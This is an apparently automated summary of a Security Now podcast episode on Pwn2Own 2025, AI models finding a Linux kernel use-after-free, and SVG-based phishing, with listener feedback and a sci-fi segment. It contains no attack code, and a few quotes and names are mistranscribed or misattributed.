Podcast Summary: Security Now 1028: AI Vulnerability Hunting
Podcast Information:
- Title: Security Now 1028: AI Vulnerability Hunting
- Host/Author: TWiT (Leo Laporte and Steve Gibson)
- Release Date: June 4, 2025
1. Introduction
In this episode of Security Now, hosts Leo Laporte and Steve Gibson delve into the evolving landscape of cybersecurity, focusing on the intersection of artificial intelligence (AI) and vulnerability hunting. The discussion promises insights into the latest hacking competitions, AI-driven security threats, and significant advancements in exploit detection.
2. PWN to Own 2025 Hacking Competition Results
The episode kicks off with an overview of the PWN to Own 2025 hacking competition held in Berlin, marking its first occurrence outside Vancouver. Organized by Trend Micro, this competition attracted some of the world's best vulnerability researchers.
-
Steve Gibson [01:19]: "The show we cover your privacy, your security, how computers work..."
-
Leo Laporte [04:16]: "So, yeah, if the good guys can discover vulnerabilities with AI, so can the bad guys."
Key Highlights:
- Star Labs SG Combined Team emerged as the top performers, securing $320,000 and 35 Master Opponent Points by exploiting VMware's ESXi.
- Summoning Team and FPT Nightwolf also showcased impressive exploits against Nvidia's Triton Inference Server.
- A total of 28 unique zero-day vulnerabilities were disclosed to respective vendors, with some remaining unpatched, notably by Nvidia.
Notable Quote:
- Leo Laporte [29:34]: "They wrote, 'Congratulations to the STAR Labs SG team for winning Master Apone. They took home $320,000 and 35 Master Opponent points during the event.'"
Conclusion: The competition underscored the persistent vulnerabilities in modern, fully patched systems, emphasizing the ongoing cat-and-mouse game between hackers and security professionals.
3. AI Vulnerability Hunting: A Double-Edged Sword
The conversation transitions to the role of AI in cybersecurity, highlighting both its potential for enhancing defensive measures and its risk of empowering malicious actors.
-
Steve Gibson [04:55]: "Well, if the good guys can discover vulnerabilities with AI, so can the bad guys."
-
Leo Laporte [05:02]: "I do make the point that if the AI is used before the release of the software, then there won't be vulnerabilities for the bad guys to find."
Discussion Points:
- Proactive Security: Utilizing AI models like Claude Code to write tests and identify vulnerabilities before software release.
- Balancing Act: The symmetry between defensive and offensive uses of AI in vulnerability discovery.
Notable Quote:
- Leo Laporte [05:29]: "I've been using Claude Code and AI to write tests, which I think is a really good use of AI to provide an independent eye looking at your code."
4. Listener Feedback and Insights
The hosts engage with feedback from listeners, addressing complex topics such as encrypted client hellos in enterprise environments and the challenges of AI in code review.
Listener Contributions:
-
Kevin (Cloud Security Engineer): Discusses the necessity of blocking Encrypted Client Hello (ECH) in corporate settings to maintain traffic inspection capabilities.
-
Aaron Morgan (Microsoft Software Engineering Manager): Shares experiences with Microsoft's Copilot, emphasizing the importance of precise prompting to mitigate subpar AI-generated code.
-
Andrew Mitchell (Voipster Communications, Inc.): Requests support for the Linux Dictation Project, aimed at enhancing voice control systems for accessibility.
Notable Quotes:
-
Leo Laporte [112:11]: "Otherwise, we have to man in the middle ourselves. Oh, to decrypt and re-encrypt all that traffic..."
-
Aaron Morgan [117:01]: "I'm pleased to hear he's one of the go-to reviewers and as an experienced dev, he's asking the AI the right questions because as Steve Tube did, receive the first reply which indicates an insufficiently deep approach to the problem..."
5. The SVG Security Threat
A significant portion of the episode is dedicated to discussing the rising abuse of Scalable Vector Graphics (SVG) files in phishing attacks. SVGs' ability to embed JavaScript makes them potent tools for cybercriminals.
Key Points:
-
Cloudflare's Analysis: Reports a 245% increase in SVG files used to obfuscate phishing payloads.
-
Attack Vectors: SVGs used for redirects, self-contained phishing pages, and DOM manipulation to execute malicious scripts.
-
Security Recommendations: Implementing stricter controls on SVG scripting within email clients and browsers to mitigate these threats.
Notable Quote:
- Leo Laporte [86:52]: "What idiot decided that allowing JavaScript to run inside a simple two-dimensional vector-based image format would be a good idea?"
Conclusion: The inherent scripting capabilities within SVGs, combined with their widespread support, present a significant security challenge that demands immediate attention from developers and security professionals alike.
6. Classic Sci-Fi Movies and AI
In a lighter segment, the hosts reminisce about classic science fiction films that mirror today's AI advancements and societal concerns.
Featured Movies:
-
"Colossus: The Forbin Project" (1970): Explores themes of AI autonomy and control.
-
Other Classics: Mention of "Forbidden Planet" and "The Day the Earth Stood Still," highlighting their enduring relevance.
Notable Quote:
- Leo Laporte [129:12]: "It's 70 years ago, absolutely a classic still relevant today."
Conclusion: These films serve as cultural touchstones, reflecting contemporary anxieties and aspirations regarding AI and technological supremacy.
7. Deep Dive: AI Discovers a Zero-Day in Linux Kernel
The episode culminates with an in-depth analysis of how OpenAI's O3 model was employed to uncover a previously unknown zero-day vulnerability in the Linux kernel's SMB implementation.
Key Highlights:
-
Sean Healing's Experiment:
- Utilized the O3 model to analyze approximately 12,000 lines of Linux kernel code.
- Discovered a use-after-free (UAF) vulnerability, designated as CVE-2025-37899.
-
Vulnerability Details:
- Occurs in the Kerberos authentication path, allowing remote attackers to execute arbitrary code.
- The exploit involves concurrent thread operations leading to memory corruption.
-
Performance Metrics:
- O3 Model: Detected the known vulnerability in 1 out of 100 runs and identified a novel vulnerability in 1 additional run.
- Claude Sonnet 3.7: Detected the vulnerability in 3 out of 100 runs.
- Claude Sonnet 3.5: Did not detect the vulnerability.
Notable Quotes:
-
Sean Healing [141:40]: "LLMs have made a leap forward in their ability to reason about code. If you have a problem that can be represented in fewer than 10,000 lines of code, there is a reasonable chance O3 can either solve it or help you solve it."
-
Steve Gibson [180:46]: "This is fantastic. Love it."
Technical Explanation: The hosts provide a comprehensive explanation of use-after-free vulnerabilities, emphasizing their severity and the sophistication required to exploit them effectively. Sean's successful use of the O3 model demonstrates AI's growing capability in aiding vulnerability research, though challenges such as false positives remain.
Conclusion: AI models like O3 are emerging as powerful tools in the cybersecurity arsenal, capable of identifying critical vulnerabilities that were previously the domain of expert human researchers. This advancement signifies a transformative shift in how security professionals approach vulnerability discovery and mitigation.
8. Closing Remarks and Community Engagement
In the final segments, the hosts encourage listener participation, promote community forums, and acknowledge sponsors who support the show's mission to inform and protect the cybersecurity community.
Call to Action:
-
Support Projects: Encouraging listeners to support initiatives like the Linux Dictation Project aimed at enhancing accessibility.
-
Engage with the Community: Invitation to join forums, subscribe to newsletters, and participate in discussions to stay updated on the latest security trends.
Notable Quote:
- Steve Gibson [125:52]: "Guys, let's take a break and then we're going to talk about the unbelievable design of scalable vector graphics."
Conclusion
Security Now 1028: AI Vulnerability Hunting offers a compelling exploration of the synergistic potential and inherent risks of integrating AI into cybersecurity practices. From competitive hacking events to groundbreaking AI-driven vulnerability discoveries, the episode underscores the dynamic and ever-evolving nature of digital security. The hosts adeptly balance technical depth with accessible explanations, providing valuable insights for both seasoned professionals and curious enthusiasts alike.